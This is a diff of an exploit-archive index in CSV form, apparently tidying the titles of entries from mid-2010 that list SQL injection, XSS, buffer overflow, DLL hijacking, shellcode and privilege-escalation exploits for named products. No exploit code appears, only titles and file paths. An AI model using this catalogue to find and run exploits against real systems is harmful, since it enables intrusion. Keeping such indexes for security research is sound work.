14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow Vulnerability",2010-07-14,webDEViL,windows,local,0 -14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL injection vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 +14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection Vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 -14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 -14365,platforms/php/webapps/14365.txt,"Campsite CMS remote Persistent XSS vulnerability",2010-07-15,D4rk357,php,webapps,0 +14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 +14365,platforms/php/webapps/14365.txt,"Campsite CMS remote Persistent XSS Vulnerability",2010-07-15,D4rk357,php,webapps,0 14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability",2010-07-15,"Salvatore Fresta",php,webapps,0 @@ -12598,7 +12598,7 @@ id,file,description,date,author,platform,type,port 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script Persistent XSS Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script Upload Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 -14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds Persistent Xss Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 +14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds Persistent XSS Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix (cal_cat.php) SQL Injection Vulnerability",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 @@ -12629,7 +12629,7 @@ id,file,description,date,author,platform,type,port 14424,platforms/windows/dos/14424.txt,"Lithtech Engine Memory Corruption Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability",2010-07-20,"HaCkEr arar",php,webapps,0 14426,platforms/php/webapps/14426.pl,"Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability",2010-07-21,Metropolis,php,webapps,0 -14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 CSRF Vulnerability",2010-07-21,anonymous,windows,webapps,0 +14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - CSRF Vulnerability",2010-07-21,anonymous,windows,webapps,0 14428,platforms/windows/local/14428.py,"QQPlayer asx File Processing Buffer Overflow Exploit",2010-07-21,"Li Qingshan",windows,local,0 14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts Remote File Upload Vulnerability",2010-07-21,H-SK33PY,php,webapps,0 14431,platforms/windows/local/14431.py,"QQPlayer cue File Buffer Overflow Exploit",2010-07-21,"Lufeng Li",windows,local,0 @@ -12641,7 +12641,7 @@ id,file,description,date,author,platform,type,port 14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0 -14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)",2010-07-22,Silic0n,php,webapps,0 +14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass Vulnerability)",2010-07-22,Silic0n,php,webapps,0 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection Vulnerability",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI Shell Upload Vulnerability",2010-07-23,EraGoN,php,webapps,0 @@ -12649,7 +12649,7 @@ id,file,description,date,author,platform,type,port 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost PHP SQL Injection Vulnerability",2010-07-23,Cyber-sec,php,webapps,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)",2010-07-23,"Pouya Daneshmand",windows,remote,0 -14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (beta) & 1 (beta) - SQL Injection Vulnerability",2010-07-23,Valentin,php,webapps,0 +14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (beta) & 1 (beta) - SQL Injection Vulnerability",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) - (meta)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 @@ -12671,25 +12671,25 @@ id,file,description,date,author,platform,type,port 14469,platforms/php/webapps/14469.txt,"XAOS CMS SQL Injection Vulnerability",2010-07-25,H-SK33PY,php,webapps,0 14470,platforms/php/webapps/14470.txt,"Ballettin Forum SQL Injection Vulnerability",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition SQL Injection Exploit",2010-07-25,neavorc,php,webapps,0 -14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 Multiple Blind SQL Injection Vulnerabilities",2010-07-25,"Salvatore Fresta",php,webapps,0 +14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection Vulnerabilities",2010-07-25,"Salvatore Fresta",php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 SQL Injection Vulnerability",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability",2010-07-26,Li0n-PaL,php,webapps,0 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 -14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0 +14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 - Remote DoS Vulnerability",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 -14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2010-07-28,mywisdom,unix,remote,0 +14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0 14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 -14492,platforms/windows/remote/14492.c,"Symantec AMS Intel Alert Handler Service Design Flaw",2010-07-28,Spider,windows,remote,0 +14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service Design Flaw",2010-07-28,Spider,windows,remote,0 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injection",2010-07-28,"Salvatore Fresta",php,webapps,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 -14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 +14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) SQL Injection Vulnerability",2010-07-29,Forza-Dz,php,webapps,0 @@ -12742,7 +12742,7 @@ id,file,description,date,author,platform,type,port 14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 -14580,platforms/windows/remote/14580.html,"Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0day",2010-08-08,"ThE g0bL!N",windows,remote,0 +14580,platforms/windows/remote/14580.html,"Advanced File Vault - (eSellerateControl350.dll) Activex Heap Spray (0day)",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0 @@ -12754,13 +12754,13 @@ id,file,description,date,author,platform,type,port 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 -14595,platforms/php/webapps/14595.html,"wizmall 6.4 CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 +14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 -14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 -14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH buffer overflow PoC",2010-08-10,anonymous,windows,dos,0 +14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 +14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP - BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 @@ -12830,7 +12830,7 @@ id,file,description,date,author,platform,type,port 14689,platforms/windows/dos/14689.pl,"Tuniac 100723 Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 14691,platforms/lin_x86/shellcode/14691.c,"Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes",2010-08-19,Aodrulez,lin_x86,shellcode,0 -14693,platforms/windows/local/14693.py,"MS Word Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 +14693,platforms/windows/local/14693.py,"Microsoft Word Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 14694,platforms/php/webapps/14694.txt,"Joomla Component com_extcalendar Blind SQL Injection Vulnerability",2010-08-20,Lagripe-Dz,php,webapps,0 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service Vulnerability",2010-08-20,PASSEWORD,windows,dos,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English MessageBoxA Shellcode - 87 bytes",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0 @@ -12840,13 +12840,13 @@ id,file,description,date,author,platform,type,port 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 -14706,platforms/windows/local/14706.py,"MS Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 +14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14712,platforms/php/webapps/14712.txt,"4images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 -14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 +14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 14716,platforms/php/webapps/14716.txt,"AneCMS /registre/next - SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 14717,platforms/php/webapps/14717.txt,"LINK CMS SQL Injection Vulnerability",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla Component (com_zoomportfolio) SQL Injection Vulnerability",2010-08-23,"Chip d3 bi0s",php,webapps,0 @@ -12882,7 +12882,7 @@ id,file,description,date,author,platform,type,port 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version <9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 +14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Versions < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,anonymous,windows,local,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 @@ -12896,7 +12896,7 @@ id,file,description,date,author,platform,type,port 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 DLL Hijacking Exploit (wintab32.dll)",2010-08-25,CCNA,windows,local,0 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)",2010-08-25,storm,windows,local,0 -14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal vulnerability",2010-08-25,demonalex,windows,remote,0 +14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal Vulnerability",2010-08-25,demonalex,windows,remote,0 14780,platforms/windows/local/14780.c,"Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll)",2010-08-25,ALPdaemon,windows,local,0 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14782,platforms/windows/local/14782.c,"Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)",2010-08-25,storm,windows,local,0 @@ -12909,7 +12909,7 @@ id,file,description,date,author,platform,type,port 14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0 14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0 -14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 +14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking Exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 14795,platforms/bsd/shellcode/14795.c,"bds/x86-bindshell on port 2525 shellcode - 167 bytes",2010-08-25,beosroot,bsd,shellcode,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant Remote File Inclusion Vulnerability",2010-08-26,LoSt.HaCkEr,php,webapps,0 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 @@ -12954,7 +12954,7 @@ id,file,description,date,author,platform,type,port 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 -14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal vulnerability",2010-09-01,chr1x,windows,remote,0 +14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0 14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 @@ -12996,13 +12996,13 @@ id,file,description,date,author,platform,type,port 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 -14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal vulnerability",2010-09-07,Rew,linux,remote,0 +14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal Vulnerability",2010-09-07,Rew,linux,remote,0 14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 -14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal vulnerability",2010-09-07,Saxtor,php,webapps,0 +14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0 -14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0 +14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 @@ -13027,7 +13027,7 @@ id,file,description,date,author,platform,type,port 14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0 14971,platforms/windows/dos/14971.py,"Microsoft Office Word 2007 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 -14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 +14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability",2010-09-12,"YuGj VN",php,webapps,0 14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection Vulnerability",2010-09-12,Amine_92,php,webapps,0 @@ -13052,7 +13052,7 @@ id,file,description,date,author,platform,type,port 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0 15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 -15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 +15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -13060,7 +13060,7 @@ id,file,description,date,author,platform,type,port 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 -15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 - x86_64 compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 +15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 - x86_64 compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 @@ -13077,20 +13077,20 @@ id,file,description,date,author,platform,type,port 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 -15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal vulnerability",2010-09-19,sqlhacker,windows,remote,0 